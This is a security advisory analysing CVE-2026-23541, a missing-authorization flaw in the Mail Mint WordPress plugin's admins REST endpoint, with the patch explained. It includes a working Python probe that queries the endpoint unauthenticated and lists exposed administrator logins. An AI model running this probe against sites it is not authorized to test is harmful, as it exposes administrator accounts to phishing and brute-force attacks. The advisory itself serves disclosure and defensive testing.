Atomic Edge analysis of CVE-2026-23541:
The Mail Mint WordPress plugin, version 1.19.4 and earlier, contains a missing-authorization vulnerability in the REST API endpoint that returns the site's administrator users. The flaw lets unauthenticated attackers read sensitive data about administrative accounts.

Atomic Edge research identifies the root cause in the `WPRoute.php` file. The plugin registers a REST route at `/wp-json/mailmint/v1/admins`. The route's `permission_callback` is set to `'__return_true'` (line 149 in the diff), so WordPress accepts every request to it, authenticated or not. The `get_admins` method in the associated controller performs no capability check of its own, so nothing downstream stops the request either.

An attacker can exploit this with a single HTTP GET request to the vulnerable REST endpoint. The target URL is `/wp-json/mailmint/v1/admins`. No authentication headers, cookies, or specific parameters are required. The server responds with a JSON array of administrator user records containing details such as IDs, email addresses, and usernames.

The patch changes the `permission_callback` in `WPRoute.php` from `'__return_true'` to `PermissionManager::current_user_can( 'manage_options' )`. WordPress now evaluates the capability check before invoking the `get_admins` controller method, restricting the endpoint to users with the `manage_options` capability, which by default only administrators hold. Callers without it receive WordPress's standard `rest_forbidden` error (HTTP 401 for unauthenticated requests, 403 for logged-in users lacking the capability). The version number in `mail-mint.php` increments to 1.19.5, and the other file changes reflect build updates.
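The following probe is an added example written for this analysis; it is not Atomic Edge's code and not part of the Mail Mint plugin. It sends the unauthenticated GET described above and then classifies the reply: a 200 with a JSON array is treated as vulnerable, and the `rest_forbidden` error that WordPress core returns when a `permission_callback` fails is treated as patched. The field names `ID`, `user_login` and `user_email` in the constructed sample responses are assumptions about the record layout (the analysis only says IDs, emails and usernames are returned); the `SAMPLE_*` responses are constructed, not captured from a real site.

```python
"""Unauthenticated check for the Mail Mint /wp-json/mailmint/v1/admins route.

Added example, not the plugin's or Atomic Edge's code. The sample responses
below are constructed from the behaviour the analysis describes and from
WordPress core's standard rest_forbidden error; field names are assumed.
"""
import json
import sys
import urllib.error
import urllib.request

ENDPOINT = "/wp-json/mailmint/v1/admins"


def classify(status: int, body: bytes) -> dict:
    """Classify one HTTP response as 'vulnerable', 'patched' or 'unknown'.

    Returns the verdict plus the list of exposed admin logins so an
    authorized tester can confirm the finding without dumping every field.
    """
    try:
        data = json.loads(body.decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError):
        return {"verdict": "unknown", "admins": []}

    # Vulnerable builds answer 200 with a bare JSON array of user records.
    if status == 200 and isinstance(data, list):
        users = [u for u in data if isinstance(u, dict)]
        # Assumed field names: user_login / user_email / ID.
        names = [
            str(u.get("user_login") or u.get("user_email") or u.get("ID", "?"))
            for u in users
        ]
        return {"verdict": "vulnerable", "admins": names}

    # A failed permission_callback yields WP core's rest_forbidden error:
    # 401 when unauthenticated, 403 when logged in without the capability.
    if status in (401, 403) and isinstance(data, dict) and data.get("code") == "rest_forbidden":
        return {"verdict": "patched", "admins": []}

    return {"verdict": "unknown", "admins": []}


def probe(base_url: str, timeout: float = 10.0) -> dict:
    """GET the endpoint with no cookies or auth headers and classify the reply.

    Network errors (DNS, refused connection) propagate to the caller.
    """
    url = base_url.rstrip("/") + ENDPOINT
    req = urllib.request.Request(
        url,
        headers={"Accept": "application/json", "User-Agent": "cve-2026-23541-check"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(resp.status, resp.read())
    except urllib.error.HTTPError as err:
        # 401/403/5xx arrive here; the body still carries WP's JSON error.
        return classify(err.code, err.read())


# Constructed sample responses (not captured from a real site).
SAMPLE_VULNERABLE = (
    200,
    b'[{"ID":1,"user_login":"admin","user_email":"admin@example.com"},'
    b'{"ID":7,"user_login":"ops","user_email":"ops@example.com"}]',
)
SAMPLE_PATCHED = (
    401,
    b'{"code":"rest_forbidden","message":"Sorry, you are not allowed to do that.",'
    b'"data":{"status":401}}',
)


if __name__ == "__main__":
    # Usage: python probe.py https://site.example  (only with authorization)
    if len(sys.argv) == 2:
        result = probe(sys.argv[1])
    else:
        result = classify(*SAMPLE_VULNERABLE)  # offline demonstration
    print(f"{result['verdict']}: {len(result['admins'])} admin account(s) exposed")
```

Run it only against sites you are authorized to test. The script deliberately reports a count and the logins rather than echoing every field, so a finding can be recorded without copying the disclosed email addresses into a report.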

Successful exploitation results in unauthorized information disclosure. An attacker can enumerate every WordPress administrator account the Mail Mint endpoint returns, obtaining valid usernames and email addresses. That list supports targeted phishing, credential brute-forcing against known administrator logins, and further privilege escalation by identifying the highest-value accounts on the site.